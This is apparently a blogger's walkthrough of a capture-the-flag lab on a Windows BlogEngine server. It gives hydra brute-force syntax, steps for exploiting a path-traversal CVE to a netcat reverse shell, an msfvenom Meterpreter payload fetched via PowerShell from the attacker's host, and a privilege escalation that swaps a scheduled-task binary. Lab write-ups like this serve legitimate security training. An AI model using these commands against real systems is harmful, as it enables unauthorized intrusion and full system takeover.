This room will cover brute-forcing an accounts credentials, handling public exploits, using the Metasploit framework and privilege escalation on Windows.
Doesn't look like they want us to do anything fancy. We're just gonna hit the site... and the first question is who's the clown. If you don't know the movie then you'll have to do a reverse image search.
What request type is the Windows website login form using?
I'm pretty lazy so I'm not going to use Burp just yet. I'll use the Web Developer Tools built into Firefox. I'll go to the network tab and send a username and password through the site and see what pops up below.
Guess a username, choose a password wordlist and gain credentials to a user account!
I think they kinda forgot some pieces to this so I'd recommend some extra reading here: https://infinitelogins.com/2020/02/22/how-to-brute-force-websites-using-hydra/
We're going to use this from that website as their template.
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"K, so here's the hydra syntax I'm going to try, take note of the ^PASS^ variable:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.184.247 http-post-form "/Account/Login.aspx:__VIEWSTATE=cxhYmSjA9fMEQnpKqxHhpnt97yXja6alGXP9Ot%2BcrVwiIzfs5%2Fe%2FSXFboHaOYYPMlPlKx0xpyeI%2F082aZA4b7ZBGGFXQjYsZCw61puJnWYnCJ2COugNzT4N6ceTGF3dVjYqp8Jj%2F94WdpZGDJre3RhOkcl3MlhNRV0GahjRUJzwrqiKJpE5rL57BGey%2FWkAMWTazsNDfLNyzyWabB9QEVx9bxrfadJKBy15O80wamsj%2FC2M1IDe6eohuoX4AUQmO1R4oUOLglIy0yCLJuokxyOkCnm3e8n5UfcHgUzZ%2BtIc7IyQA2C1m83yaW0RbNczCo09wLedjtEIVqPo7FpHahuXO8nUavXlD8CzaG3xDdn3m1bR7&__EVENTVALIDATION=5oolEJPFibvu7HwhZYMiNlFSwME%2FJmlvjmOyOkgTOrGBhX84qlHahPTHtcJF8XXGnBuhc5EalgOm%2BmJJ9HKGgSLgv%2Fx7gsM9csMjYFhD15gryQ2bZJ8IwIXcRQNWkOBvuwmdAcy%2F3PbMb2tG4vdL%2FTXSHaAgthdozgPs7GXRojY3Z5Tl&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"Now you have logged into the website, are you able to identify the version of the BlogEngine?
Searching exploit-db we can find a single verified exploit.
Opening it up, we can see the CVE number for this question.
Who is the webserver running as?
The CVE looks to be a path traversal vulnerability leading to remote code execution. It's an unchecked "theme" parameter that is used to override the default theme for rendering blog pages. Reading the well documented readme portion of the script, we can understand what we're supposed to be doing with this:
First, we set the TcpClient address and port within the method below to our attack host, who has a reverse tcp listener waiting for a connection.
Next, we upload this file through the file manager. In the current (3.3.6) version of BlogEngine, this is done by editing a post and clicking on the icon that looks like an open file in the toolbar. Note that this file must be uploaded as PostView.ascx. Once uploaded, the file will be in the /App_Data/files directory off of the document root.
The admin page that allows upload is:
http://10.10.10.10/admin/app/editor/editpost.cshtml
Finally, the vulnerability is triggered by accessing the base URL for the blog with a theme override specified like so:
http://10.10.10.10/?theme=../../App_Data/files We can download the file itself from the download arrow next to the word EXPLOIT, at the top of the page. Following the directions, we open a listener on our end
nc -lvnp 4445Then we modify the file to put our attack box IP and port in there.
Then we can save a copy of it as the title they want us to use
cp 46353.cs PostView.ascxWe can now upload it to the post
Then visit the page they suggest:
http://10.10.10.10/?theme=../../App_Data/files The page will look like it's frozen loading but your listener prompt should now have a connection back to the server. There will be no prompt so once you get the blank curse you can get the info for the question with a 'whoami'.
Okay so the next step is to upgrade our shell: "Our netcat session is a little unstable, so lets generate another reverse shell using msfvenom." I'm going to use the msfvenom we used from the previous lesson.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.10.191.87 LPORT=1234 -f exe -o shell.exeI'm then going to host it with a python web server
python3 -m http.serverThen we'll move into our temp directory (C:\Windows\Temp), because I couldn't seem to get write access to the folder we were in. Download it on the box we already have a shell on
powershell Invoke-WebRequest -OutFile shell.exe -Uri http://10.10.191.87:8000/shell.exeNext we start jump into MSFConsole and set our stuff
use multi/handler
options
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.191.87
set LPORT 8000
runThen we run the shell.exe file on the host... and we should see our reverse shell come up in msfconsole. A few things to note. I couldn't get a decent meterpreter sessions when using the VM's they provided and had to use my own VM and VPN in. We may also need to switch to that session to start using it.
sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/wind IIS APPPOOL\Blog @ HA 10.10.120.121:1234 ->
ows CKPARK 10.10.159.44:49280 (
10.10.159.44)
sessions 1We can then run sysinfo to get the answer to our next question. I had some issues using the script they suggested here: https://github.com/GDSSecurity/Windows-Exploit-Suggester so instead we're going to use what they suggested in the video, WinPeas: https://github.com/peass-ng/PEASS-ng/releases/tag/20240421-825f642d
We've downloaded both the exe and bat file to play with. We're going to create another Python web server to host our .bat file and download it on the client with another PowerShell 'Invoke-WebRequest'.
First let's type shell in our meterpreter shell to drop into a windows shell. It will be easier to download the powershell command.
On my system I type:
python3 -m http.serverThe download the file with PowerShell
powershell Invoke-WebRequest -OutFile winPEAS.bat -Uri http://10.6.27.189:8000/winPEAS.batThe we just run winpeas on the client machine
winPEAS.batIt will take a minute to go through its stuff. After a bit though, it said Scan complete . If we scroll up, we can see some service paths. The one of interest is an unquoted path for WindowsScheduler... looks like someone doesn't do their patching.
We can see this binary is in C:\Program Files (x86)\SystemScheduler by manually going through the directories. I've exited out of our shell to get back to a Meterpreter session as you can tab complete in our Meterpreter session. You can do this by just typing
exitIf we move into the Events sub folder and cat out the advanced log we can see it calling Message.exe over and over again... as administrator.
04/21/24 07:19:01,Event Started Ok, (Administrator)04/21/24 07:19:34,Process Ended. PID:2252,ExitCode:4,Message.exe (Administrator)04/21/24 07:20:01,Event Started Ok, (Administrator)04/21/24 07:20:33,Process Ended. PID:1732,ExitCode:4,Message.exe (Administrator)04/21/24 07:21:00,Event Started Ok, (Administrator)04/21/24 07:21:33,Process Ended. PID:1176,ExitCode:4,Message.exe (Administrator)04/21/24 07:22:01,Event Started Ok, (Administrator)04/21/24 07:22:33,Process Ended. PID:1628,ExitCode:4,Message.exe (Administrator)OK so I think what we want to do here is change this file to be our own created reverse shell. Thankfully we already have one! shell.exe from previous.
OK, let's try this. We're going to do our famous powershell file copy again and copy the shell.exe into this new folder that Message.exe lives. Then we're goin to rename both files, changing shell.exe to be the new Message.exe
So we start up our python webserver
python3 -m http.serverthen powershell to get our shell.exe file
powershell Invoke-WebRequest -OutFile shell.exe -Uri http://10.6.27.189:8000/shell.exeThen we can rename our files
rename Message.exe Message.bakrename shell.exe Message.exeWe then background our current Meterpreter session by simply typing
backgroundThen we re-run our existing handler to listen for a new session. Once the scheduled task picks up another session, it should drop us into it.
We cant' get a whoami to prove anything but we can now go to C:\Users\jeff\Desktop and cat out the user.txt file as well as the C:\Users\Administrator\Desktop\root.txt file.
For the last part of this, just re-run winPEAS to get the original install date of the server - it's WAY at the top of the output.